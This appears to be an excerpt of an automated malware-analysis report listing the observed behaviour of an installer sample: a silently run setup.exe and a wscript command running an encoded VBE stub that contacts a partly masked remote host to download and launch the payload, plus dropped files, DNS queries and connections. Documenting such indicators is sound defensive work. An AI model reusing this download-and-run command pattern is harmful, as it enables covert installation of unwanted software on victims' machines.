Technical Information
- %TEMP%\stb1.tmp\setup.exe (downloaded from the Internet) -i 15fc5c2723bc49d7a989bcab4c1437ea -p QstbscWD3 /S
- <SYSTEM32>\wscript.exe /B "%TEMP%\stb2.tmp\stub.vbe" "http://up#####.areaejectzone.com/install.aspx?b=##########" "%TEMP%\stb1.tmp\setup.exe" ""%TEMP%\stb1.tmp\setup.exe" -i 15fc5c2723bc49d7a989bcab4c1437ea -p QstbscWD3 /S" "http://up#####.areaejectzone.com/?vn###########################################################################################################################################################################################################" 0 1
- %TEMP%\stb1.tmp\setup.exe
- %TEMP%\stb2.tmp\stub.vbe
- %TEMP%\stb1.tmp\setup.exe
- %TEMP%\stb2.tmp\stub.vbe
- 'up#####.areaejectzone.com':80
- up#####.areaejectzone.com/?vn#########################################################################################################################################################################################################
- up#####.areaejectzone.com/install.aspx?b=##########
- DNS ASK up#####.areaejectzone.com
- '<Private IP address>':1036